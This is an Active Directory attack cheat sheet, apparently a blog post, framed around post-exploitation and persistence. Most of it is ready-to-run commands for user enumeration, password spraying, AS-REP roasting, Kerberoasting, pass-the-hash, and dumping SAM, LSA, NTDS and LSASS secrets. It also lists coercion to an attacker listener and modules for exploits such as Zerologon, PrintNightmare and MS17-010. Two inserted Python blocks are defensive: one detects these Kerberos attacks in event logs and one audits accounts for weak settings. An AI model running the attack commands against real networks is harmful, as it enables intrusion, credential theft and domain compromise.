Active Directory Quick Enum
I am creating a simple quick recon checklist for Active Directory environments in an internal network, for post-exploitation and persistence.
Scanning Active Directory
```bash
nmap -T4 -Pn -n -vv -A -sCV $IP
rustscan -a $IP -- -A
fscan -h $IP -p 1-65535 ALL
```
System & Identity
Identify the domain name and the domain controller IP addresses.
```bash
# [Domain Name]
nxc smb $target
nmap -sCV -T4 -vv -Pn -A $target
# [DC IP]
host $Domain
nmcli dev show <interface>
# [IPv6]
python3 IOXIDResolver.py -t 192.168.xx.xx
```
Assume Breach Scenario
—> Possible Common Attacks
Enumerate Users
```bash
nxc smb $ip -u '' -p '' --users
kerbrute userenum --dc $IP -d $Domain valid-users.lst -v
net rpc group members 'Domain Users' -W '<domain>' -I <ip> -U '%'
nxc smb $ip -u '' -p '' --rid-brute 10000 | grep -i 'sidtypeuser'
ldapsearch -x -H ldap://<ip> -D '<user>@<domain>' -w '<pass>' -b '<base_naming_context>' "(objectClass=user)" userPrincipalName
ldapsearch -x -H ldap://<ip> -D "<user>@<domain>" -w '<password>' -b "<base_name>" -s sub '(objectClass=user)' | grep -i samaccountname | awk -F' ' '{print $2}'
bloodyAD --host $ip -d $domain -u $user -p "$pass" get children --otype useronly
bloodyAD --host $ip -d $domain -u $user -p "$pass" get children --otype computer
impacket-lookupsid $domain/$user@$ip
```
Enumerate LDAP
```bash
nmap -Pn -n -sV --script=ldap* -p 389 $ip -vv
ldapsearch -H ldap://<ip> -x -s base namingcontexts
ldapdomaindump -u "$domain\\$user" -p "$pass" $ip -o ldap/
ldapsearch -x -H ldap://<target_ip_or_hostname> -b "<base_name>" "(objectClass=*)" "*"
bloodyAD --host $ip -d $domain -u $user -p "$pass" get writable --detail
bloodyAD -u $user -p "$pass" -d $domain --host $ip get search --filter '(|(userPassword=*)(description=*))' --attr userPassword,description
```
Enumerate Shares
```bash
smbclient -U '%' -L //<ip>     # once inside a share: recurse OFF ; prompt OFF ; mget *
nxc smb $ip -u '' -p '' --shares
enum4linux-ng.py -a -u '' -p '' <ip>
manspider $ip -c passw -e xml config pdb -d $Domain -u "$user" -p "$pass"
smbclient.py "$Username:$pass@$FQDN"
impacket-smbclient [domain]/[username]:[password]@[target_ip]
impacket-smbclient [domain]/[username]@[target_ip] -hashes [LMHASH]:[NTHASH]
impacket-smbclient [domain]/[username]@[target_ip] -k -no-pass
```
Generate Usernames
```bash
username-anarchy -i users.txt > valid-user.lst
GenUser_list.sh -i users.txt > valid-user.lst
```
TimeRoast
```bash
timeroast.py <dc_ip> -o <output_log>
nxc smb $ip -M timeroast
nxc smb $ip -u '' -p '' -M timeroast
nxc smb $ip -u '' -p '' -M timeroast -k
```
Pre2k
```bash
nxc ldap $ip -u '' -p '' --computers
nxc ldap $ip -u '' -p '' -M pre2k -k
python3 pre2k.py unauth -d $domain -dc-ip $ip -inputfile Computers.lst -stoponsuccess
python3 pre2k.py auth -u "$user" -p "$pass" -d $domain -dc-ip $ip -save -verbose
ldapsearch -x -H ldap://$IP -D "<user>@<domain>" -w '<password>' -b "<base_name>" -s sub '(objectClass=user)' | grep -i samaccountname | awk -F' ' '{print $2}'
# [Hacker Recipe Resource]
# 1. find pre-created computer accounts that never logged on (userAccountControl=4128 = WORKSTATION_TRUST_ACCOUNT + PASSWD_NOTREQD)
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt
# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt
# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt
# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce
```
DNS
```bash
# [Zone Transfer]
dig @$IP $Domain -t AXFR
dig AXFR $Domain @$IP
# [Fetch all Records]
dig @$IP $Domain -t ANY
dig ANY $Domain @$IP
# [View SSL Certificate of HTTPS Websites]
sslscan $Domain
# [DNS Spoofing: Capturing NTLMv2 Hash]
# - First, you need a virtual host that is not registered in the DNS records.
# - Second, you need the server's .pfx file and a crackable password for it (pfx2john).
# - If all of this is found, you are able to do this attack (like the TryHackMe Ra2 room, where I learned it).
```
Spray Password and Hash
```bash
nxc smb $ip -u '' -p '' --continue-on-success --no-bruteforce
NetSpray all $ip -u '' -p '' or -H '' --continue-on-success --no-brute-force
kerbrute passwordspray -d <domain> --dc <DC_IP> <user_list> <password>
```
AS-REP Roasting
```bash
# It needs a users file
nxc ldap $ip -u 'user.txt' -p '' --asreproast ASREPROAST
impacket-GetNPUsers -dc-ip $ip $Domain/ -usersfile valid_user.lst -format john -outputfile hashes
bloodyAD -u "$user" -p "$password" -d "$domain" --host "$host" get search --filter '(&(!(cn=krbtgt))(&(samAccountType=805306368)(servicePrincipalName=*)))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2
```
Kerberoasting
```bash
# It needs creds
nxc ldap $ip -u '' -p '' --kerberoasting output.txt
GetUserSPNs.py "$domain/$user:$pass" -dc-ip $ip -request
```
Kerberoasting Without Pre-auth
```bash
nxc ldap $ip -u '' -p '' --asreproast asrep.txt
GetUserSPNs.py domain.local/ -usersfile usersfile -no-preauth $USER -dc-ip $IP
```
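The three Kerberos techniques listed above (password spraying, AS-REP roasting, Kerberoasting) leave characteristic traces in domain-controller security events. The following is an added example, not part of the original checklist: detection logic over constructed 4768/4769/4771 event records. Field names follow the Windows Security event XML; the source addresses, account names and the two thresholds are assumptions chosen for the sample.

```python
# Added example (not from the original post): Kerberos abuse detection over
# constructed domain-controller audit events. The events below are made up.
from collections import defaultdict

RC4_HMAC = 0x17                  # TicketEncryptionType for RC4-HMAC (offline-crackable)
KDC_ERR_PREAUTH_FAILED = 0x18    # 4771 Status: wrong password in pre-authentication

# Constructed sample: one noisy client (10.0.0.50) and one ordinary workstation (10.0.1.23).
SAMPLE_EVENTS = [
    # Password spray: one source, many distinct users, all pre-auth failures
    *[{"EventID": 4771, "TargetUserName": f"user{i:02d}", "IpAddress": "10.0.0.50", "Status": 0x18}
      for i in range(8)],
    # A single mistyped password from a workstation
    {"EventID": 4771, "TargetUserName": "alice", "IpAddress": "10.0.1.23", "Status": 0x18},
    # TGT issued without pre-authentication (account has DONT_REQ_PREAUTH set)
    {"EventID": 4768, "TargetUserName": "legacy.app", "IpAddress": "10.0.0.50",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0x0},
    # Normal TGT request with encrypted-timestamp pre-auth and AES
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.1.23",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0x0},
    # Kerberoast: RC4 service tickets for several user-account SPNs from one client
    *[{"EventID": 4769, "TargetUserName": "alice@EXAMPLE.LOCAL", "ServiceName": svc,
       "IpAddress": "10.0.0.50", "TicketEncryptionType": 0x17, "Status": 0x0}
      for svc in ("svc_sql", "svc_web", "svc_backup")],
    # Legitimate AES service ticket for a computer account
    {"EventID": 4769, "TargetUserName": "alice@EXAMPLE.LOCAL", "ServiceName": "FS01$",
     "IpAddress": "10.0.1.23", "TicketEncryptionType": 0x12, "Status": 0x0},
]


def detect(events, spray_threshold=5, roast_threshold=3):
    """Return suspected spraying, AS-REP roasting and Kerberoasting, keyed by source IP."""
    failed_users = defaultdict(set)   # source IP -> users with 0x18 pre-auth failures
    rc4_services = defaultdict(set)   # source IP -> non-computer services with RC4 tickets
    findings = {"password_spray": [], "asrep_roast": [], "kerberoast": []}

    for ev in events:
        eid = ev["EventID"]
        if eid == 4771 and ev.get("Status") == KDC_ERR_PREAUTH_FAILED:
            failed_users[ev["IpAddress"]].add(ev["TargetUserName"])
        elif eid == 4768 and ev.get("PreAuthType") == 0 and ev.get("Status") == 0:
            # A TGT handed out with no pre-auth is exactly what AS-REP roasting harvests
            findings["asrep_roast"].append((ev["IpAddress"], ev["TargetUserName"]))
        elif eid == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
            svc = ev["ServiceName"]
            # Computer accounts ($) and krbtgt are not the targets Kerberoasting goes after
            if not svc.endswith("$") and svc.lower() != "krbtgt":
                rc4_services[ev["IpAddress"]].add(svc)

    # Many distinct users failing from one source within the window points at spraying
    for ip, users in failed_users.items():
        if len(users) >= spray_threshold:
            findings["password_spray"].append((ip, len(users)))
    # Several RC4 tickets for distinct SPNs from one client is the Kerberoast signature
    for ip, services in rc4_services.items():
        if len(services) >= roast_threshold:
            findings["kerberoast"].append((ip, sorted(services)))
    return findings


if __name__ == "__main__":
    for rule, hits in detect(SAMPLE_EVENTS).items():
        print(f"{rule}: {hits or '-'}")
```

RC4 service tickets and pre-auth-less TGTs also occur for legitimate legacy accounts, so the thresholds and the per-source grouping are what keep the rules from firing on every single event; tune them to the environment's baseline.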
Bloodhound loot
```bash
NetExec ldap $target -u '' -p '' --bloodhound --collection All --dns-server $target
bloodhound-python -d $Domain -u "$user" -p "$pass" -ns $ip -dc $Full_Domain -c All --zip
bloodyAD --host $ip -d $domain -u $user -p "$pass" get bloodhound --transitive --path ./Get_bloodhound_loot.zip
rusthound --domain $Domain -u "$user" -p "$pass" --zip
.\SharpHound.exe -s -c all,gpolocalgroup
```
—> Possible Protocol Attacks
SMB
SMB refers to Server Message Block, a network protocol for file and printer sharing across Windows, macOS, Linux, etc.
```bash
nxc smb -L
nxc smb -M <module> --options
# [Guest Access]
nxc smb $ip -u '' -p ''
nxc smb $ip -u 'Guest' -p ''
nxc smb $ip -u 'DoesNotExist' -p ''
# [Authentication]
nxc smb $ip -u '' -p ''                          # Null session
nxc smb $ip -u 'Guest' -p ''                     # Guest auth
nxc smb $ip -u '0xmr' -p ''                      # Username, no password
nxc smb $ip -u user -p pass --local-auth         # Local auth
nxc smb $ip -u user -p pass -k                   # Kerberos auth
nxc smb $ip -u user -H <NTHASH>                  # Pass-the-Hash
nxc smb $ip -u user -p pass --aesKey <KEY>       # Pass-the-Key
# [Enumeration]
nxc smb $ip -u '' -p '' --users                  # Enumerate users
nxc smb $ip -u '' -p '' --users --enabled        # Only enabled users
nxc smb $ip -u '' -p '' --users-export out.txt   # Export users list
nxc smb $ip -u '' -p '' --groups                 # Domain groups
nxc smb $ip -u '' -p '' --local-groups           # Local groups
nxc smb $ip -u '' -p '' --local-users            # Local users
nxc smb $ip -u '' -p '' --computers              # Enumerate computers
nxc smb $ip -u '' -p '' --shares                 # List shares
nxc smb $ip -u '' -p '' --dir "C$"               # List directory
nxc smb $ip -u '' -p '' --rid-brute 20000        # RID brute force
nxc smb $ip -u '' -p '' --loggedon-users         # Logged-on users
nxc smb $ip -u '' -p '' --sessions               # SMB sessions
nxc smb $ip -u '' -p '' --disks                  # Enumerate disks
nxc smb $ip -u '' -p '' --qwinsta                # RDP sessions
nxc smb $ip -u '' -p '' --pass-pol               # Password policy
nxc smb $ip -u '' -p '' --dc-list                # List DCs
nxc smb $ip -u '' -p '' --interfaces             # Network interfaces
nxc smb $ip -u '' -p '' -M enum_av               # AV/EDR detection
nxc smb $ip -u '' -p '' -M webdav                # Check WebDAV/WebClient
nxc smb $ip -u '' -p '' -M slinky                # SCF/LNK file drop in shares
nxc smb $ip -u '' -p '' --generate-krb5-file <out>   # Generate krb5 file
nxc smb $ip -u '' -p '' --generate-hosts /etc/hosts
nxc smb $ip -u '' -p '' --continue-on-success --no-bruteforce
# [Attack]
nxc smb $ip -u '' -p '' -X 'Get-Process'         # PowerShell execution
nxc smb $ip -u '' -p '' -x 'whoami /all'         # cmd execution
nxc smb $ip -u '' -p '' -M change-password -o USER=TargetUser NEWPASS=<password>   # or NEWHASH=<hash>
nxc smb $ip -u '' -p '' -M spider_plus -o DOWNLOAD_FLAG=true
nxc smb $ip -u '' -p '' -M timeroast
nxc smb $ip -u '' -p '' -M veeam                 # Veeam creds from SQL
nxc smb $ip -u '' -p '' -M petitpotam            # Check PetitPotam
nxc smb $ip -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true
# [Top CVE]
nxc smb $ip -u '' -p '' -M zerologon
nxc smb $ip -u '' -p '' -M nopac
nxc smb $ip -u '' -p '' -M printnightmare
nxc smb $ip -u '' -p '' -M smbghost
nxc smb $ip -u '' -p '' -M ms17-010
nxc smb $ip -u '' -p '' -M ntlm_reflection
nxc smb $ip -u '' -p '' -M spooler
nxc smb $ip -u '' -p '' --gen-relay-list f.txt
# [Credential Dumping]
nxc smb $ip -u '' -p '' --sam
nxc smb $ip -u '' -p '' --lsa
nxc smb $ip -u '' -p '' --ntds
nxc smb $ip -u '' -p '' -M ntdsutil              # alternative to --ntds
nxc smb $ip -u '' -p '' --dpapi
nxc smb $ip -u '' -p '' --dpapi_hash
nxc smb $ip -u '' -p '' --laps
nxc smb $ip -u '' -p '' -M backup_operator
nxc smb $ip -u '' -p '' -M wifi
nxc smb $ip -u '' -p '' -M putty
nxc smb $ip -u '' -p '' -M lsassy
nxc smb $ip -u '' -p '' -M nanodump
nxc smb $ip -u '' -p '' -M mimikatz
nxc smb $ip -u '' -p '' -M vnc
nxc smb $ip -u '' -p '' -M notepad               # or -M notepad++
nxc smb $ip -u '' -p '' -M winscp
```
LDAP
LDAP refers to Lightweight Directory Access Protocol.
```bash
nxc ldap -L
nxc ldap -M <module> --options
# [Authentication]
nxc ldap $ip -u '' -p ''                         # Null session
nxc ldap $ip -u user -p pass                     # Basic auth
nxc ldap $ip -u user -p pass -k                  # Kerberos auth
nxc ldap $ip -u user -H <NTHASH>                 # Pass-the-Hash
nxc ldap $ip -u user -p pass --local-auth        # Local auth
nxc ldap $ip -u user -p pass --aesKey <KEY>      # Pass-the-Key
# [Enumeration]
nxc ldap $ip -u '' -p '' --users
nxc ldap $ip -u '' -p '' --groups
nxc ldap $ip -u '' -p '' --computers
nxc ldap $ip -u '' -p '' --dc-list
nxc ldap $ip -u '' -p '' --active-users
nxc ldap $ip -u '' -p '' --admin-count               # adminCount=1 users
nxc ldap $ip -u '' -p '' --trusted-for-delegation    # Unconstrained delegation
nxc ldap $ip -u '' -p '' --password-not-required     # PASSWD_NOTREQD flag
nxc ldap $ip -u '' -p '' --find-delegation           # All delegation types
nxc ldap $ip -u '' -p '' --pass-pol
nxc ldap $ip -u '' -p '' -M pre2k -o ALL=True
# [Kerberos Attacks]
nxc ldap $ip -u '' -p '' --kerberoasting kerberoast.txt               # Kerberoasting
nxc ldap $ip -u '' -p '' --kerberoasting kerberoast.txt --kdcHost $ip
nxc ldap $ip -u user.txt -p '' --asreproast asrep.txt                 # AS-REP Roasting
nxc ldap $ip -u '' -p '' --asreproast asrep.txt                       # No-auth AS-REP
# [Credential Dumping]
nxc ldap $ip -u '' -p '' --gmsa                      # Dump gMSA passwords (auto-uses LDAPS)
nxc ldap $ip -u '' -p '' -M maq                      # Machine Account Quota
nxc ldap $ip -u '' -p '' -M get-desc-users           # Passwords in user description fields
nxc ldap $ip -u '' -p '' -M laps                     # Read LAPS passwords
nxc ldap $ip -u '' -p '' -M laps -o TARGET=<computer>   # LAPS for a specific machine
nxc ldap $ip -u '' -p '' -M get-unixUserPassword
nxc ldap $ip -u '' -p '' -M get-userPassword
nxc ldap $ip -u '' -p '' -M user-desc
# [ADCS]
nxc ldap $ip -u '' -p '' -M adcs                     # Find CA servers (ESC enumeration)
nxc ldap $ip -u '' -p '' -M certipy-find
nxc ldap $ip -u '' -p '' -M adcs -o SERVER=<CA>      # Target a specific CA
# [Bloodhound loot]
nxc ldap $ip -u '' -p '' --bloodhound --collection All
# [Trusts]
nxc ldap $ip -u '' -p '' --dc-list                   # Enum trusts (replaces the old -M enum_trusts)
nxc ldap $ip -u '' -p '' -M raisechild               # Abuse domain trust: child -> parent DA
# [Enum]
nxc ldap $ip -u '' -p '' -M ldap-checker
nxc ldap $ip -u '' -p '' -M pso                      # Dump Password Settings Objects (fine-grained policy)
nxc ldap $ip -u '' -p '' -M sccm                     # Enumerate SCCM servers/sites
nxc ldap $ip -u '' -p '' -M entra_id                 # Enumerate Entra ID (Azure AD) objects
```
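The Pre2k recipe, the AS-REP roasting and Kerberoasting sections and the LDAP flags above (--password-not-required, --trusted-for-delegation, -M pre2k) all key on the same few account attributes, so the same data answers all of them. The following is an added example, not part of the original checklist: a defender-side Python audit that parses an LDIF export of user and computer objects (constructed sample below, fictitious domain example.local) and lists the accounts in each risky state, using the same userAccountControl value 4128 as the page's Pre2k filter and the same sAMAccountType 805306368 as its SPN filter.

```python
# Added example (not from the original checklist): audit an LDIF export for the
# account states this checklist hunts for. The sample export below is constructed.
from collections import defaultdict

# userAccountControl flag bits (Microsoft AD documentation)
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
TRUSTED_FOR_DELEGATION = 0x80000
DONT_REQ_PREAUTH = 0x400000

SAM_USER_OBJECT = 805306368       # sAMAccountType: normal user account
SAM_MACHINE_ACCOUNT = 805306369   # sAMAccountType: computer account

# Constructed sample export: seven fictitious objects in a made-up domain.
SAMPLE_LDIF = """\
dn: CN=WS01,CN=Computers,DC=example,DC=local
sAMAccountName: WS01$
sAMAccountType: 805306369
userAccountControl: 4128
logonCount: 0

dn: CN=WS02,CN=Computers,DC=example,DC=local
sAMAccountName: WS02$
sAMAccountType: 805306369
userAccountControl: 4096
logonCount: 57

dn: CN=svc_sql,OU=Service Accounts,DC=example,DC=local
sAMAccountName: svc_sql
sAMAccountType: 805306368
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/sql01.example.local:1433
servicePrincipalName: MSSQLSvc/sql01.example.local
logonCount: 12

dn: CN=krbtgt,CN=Users,DC=example,DC=local
sAMAccountName: krbtgt
sAMAccountType: 805306368
userAccountControl: 514
servicePrincipalName: kadmin/changepw

dn: CN=legacy.app,CN=Users,DC=example,DC=local
sAMAccountName: legacy.app
sAMAccountType: 805306368
userAccountControl: 4260352
logonCount: 3

dn: CN=FS01,OU=Servers,DC=example,DC=local
sAMAccountName: FS01$
sAMAccountType: 805306369
userAccountControl: 528384
logonCount: 900

dn: CN=tempuser,CN=Users,DC=example,DC=local
sAMAccountName: tempuser
sAMAccountType: 805306368
userAccountControl: 544
logonCount: 1
"""


def parse_ldif(text):
    """Parse minimal LDIF (attr: value lines, blank line between entries) into dicts of lists."""
    entries, current = [], defaultdict(list)
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:                      # blank line ends an entry
            if current:
                entries.append(dict(current))
                current = defaultdict(list)
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")   # split on the first colon only; SPNs contain ':'
        current[attr.strip()].append(value.strip())
    if current:
        entries.append(dict(current))
    return entries


def _int(entry, attr, default=0):
    values = entry.get(attr)
    return int(values[0]) if values else default


def audit(entries):
    """Return, per weakness class, the sAMAccountNames that match."""
    findings = {"pre2k_candidates": [], "password_not_required": [], "asrep_roastable": [],
                "kerberoastable": [], "unconstrained_delegation": []}
    for e in entries:
        name = e.get("sAMAccountName", ["?"])[0]
        uac = _int(e, "userAccountControl")
        sam_type = _int(e, "sAMAccountType")
        # Pre-Windows 2000 style: computer object with PASSWD_NOTREQD that never logged on (UAC 4128)
        if uac & WORKSTATION_TRUST_ACCOUNT and uac & PASSWD_NOTREQD and _int(e, "logonCount") == 0:
            findings["pre2k_candidates"].append(name)
        if sam_type == SAM_USER_OBJECT and uac & PASSWD_NOTREQD:
            findings["password_not_required"].append(name)
        if uac & DONT_REQ_PREAUTH:        # AS-REP roastable
            findings["asrep_roastable"].append(name)
        if sam_type == SAM_USER_OBJECT and e.get("servicePrincipalName") and name.lower() != "krbtgt":
            findings["kerberoastable"].append(name)   # user account with an SPN
        if uac & TRUSTED_FOR_DELEGATION:
            findings["unconstrained_delegation"].append(name)
    return findings


if __name__ == "__main__":
    for category, names in audit(parse_ldif(SAMPLE_LDIF)).items():
        print(f"{category}: {', '.join(names) or '-'}")
```

Feed it the output of an ldapsearch over (objectClass=user) with the five attributes requested, and every non-empty category is something to fix before an attacker runs the corresponding command from this page: delete or reset pre-created computer accounts, clear PASSWD_NOTREQD and DONT_REQ_PREAUTH, move SPN accounts to gMSAs or long random passwords, and replace unconstrained delegation with constrained or resource-based delegation.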
WinRM
(Windows Remote Management)
WinRM is more like sending text messages to a computer. Instead of seeing the screen, you send commands (usually through PowerShell) and get back text results. Ports 5985 (HTTP) or 5986 (HTTPS). It works behind the scenes using standard web protocols (HTTP/HTTPS), so it plays nicely with firewalls and networks.
```bash
nxc winrm -L
# [Authentication]
nxc winrm $ip -u user -p pass                    # Basic auth (port 5985)
nxc winrm $ip -u user -p pass -d DOMAIN          # Specify domain (when the SMB port is closed)
nxc winrm $ip -u user -H <NTHASH>                # Pass-the-Hash
nxc winrm $ip -u user -p pass --local-auth       # Local account auth
# [Pass spray]
nxc winrm $ip -u '' -p '' --continue-on-success --no-bruteforce
# [Command Execution]
nxc winrm $ip -u '' -p '' -X 'whoami'
# [Enum]
nxc winrm $ip -u user-can-read-laps -p '' --laps
# [Credential Dumping]
nxc winrm $ip -u '' -p '' --sam
nxc winrm $ip -u '' -p '' --lsa
nxc winrm $ip -u '' -p '' --dpapi
```
RDP
(Remote Desktop Protocol)
Think of RDP like a video call for your computer. It lets you see and control another computer's desktop as if you were sitting right in front of it. You can open apps, click around, drag files; it feels totally normal. Port 3389.
```bash
nxc rdp -L
# [Authentication]
nxc rdp $ip -u user -p pass                      # Test a single cred
nxc rdp $ip -u user -H <NTHASH>                  # Pass-the-Hash
# [Enum]
nxc rdp $ip --nla-screenshot                     # Works when nla=false
nxc rdp $ip -u '' -p '' --screenshot
nxc rdp $ip -u '' -p '' --screenshot --screentime 5
# [Command Execution]
nxc rdp $ip -u '' -p '' -x 'whoami'
nxc rdp $ip -u '' -p '' -x 'whoami' --cmd-delay 2
nxc rdp $ip -u '' -p '' -x 'whoami' --clipboard-delay 2
```
MSSQL
(Microsoft SQL Server)
Think of it like interacting with a virtual terminal for MSSQL servers. It is a relational database management system. Port 1433.
Enumeration Cheatsheet
```bash
nxc mssql -L
# [Authentication Mode]
nxc mssql $ip -u '' -p ''
nxc mssql $ip -u '' -p '' --local-auth
nxc mssql $ip -u '' -p '' --local-auth --port 1433
nxc mssql $ip -k --use-kcache --local-auth
# [Basic Enum]
nxc mssql $ip -u '' -p '' --continue-on-success --no-bruteforce   # Password spray
nxc mssql $ip -u '' -p '' --rid-brute 20000
nxc mssql $ip -u '' -p '' --query 'select @@VERSION'
nxc mssql $ip -u '' -p '' -x 'whoami'
# [Modules]
nxc mssql $ip -u '' -p '' -M enum_impersonate
nxc mssql $ip -u '' -p '' -M enum_links
nxc mssql $ip -u '' -p '' -M enum_logins
nxc mssql $ip -u '' -p '' -M mssql_cbt
nxc mssql $ip -u '' -p '' -M mssql_priv
# [Credential Dumping]
nxc mssql $ip -u '' -p '' -M mssql_dumper
nxc mssql $ip -u '' -p '' -M nanodump
nxc mssql $ip -u '' -p '' --sam
nxc mssql $ip -u '' -p '' --lsa
# [Privilege Escalation]
nxc mssql $ip -u '' -p '' -M enable_cmdshell -o ACTION=enable      # or ACTION=disable
nxc mssql $ip -u '' -p '' -M exec_on_link -o LINKED_SERVER=Name COMMAND='select @@VERSION'
nxc mssql $ip -u '' -p '' -M mssql_coerce
```
FTP
(File Transfer Protocol)
```bash
nxc ftp $ip
nxc ftp $ip -u 'Anonymous' -p 'Anonymous'
nxc ftp $ip -u 'anonymous' -p 'anonymous'
nxc ftp $ip -u '' -p '' --ls
nxc ftp $ip -u '' -p '' --get <File_Name>
nxc ftp $ip -u '' -p '' --put <File_Name>
```
Coming soon…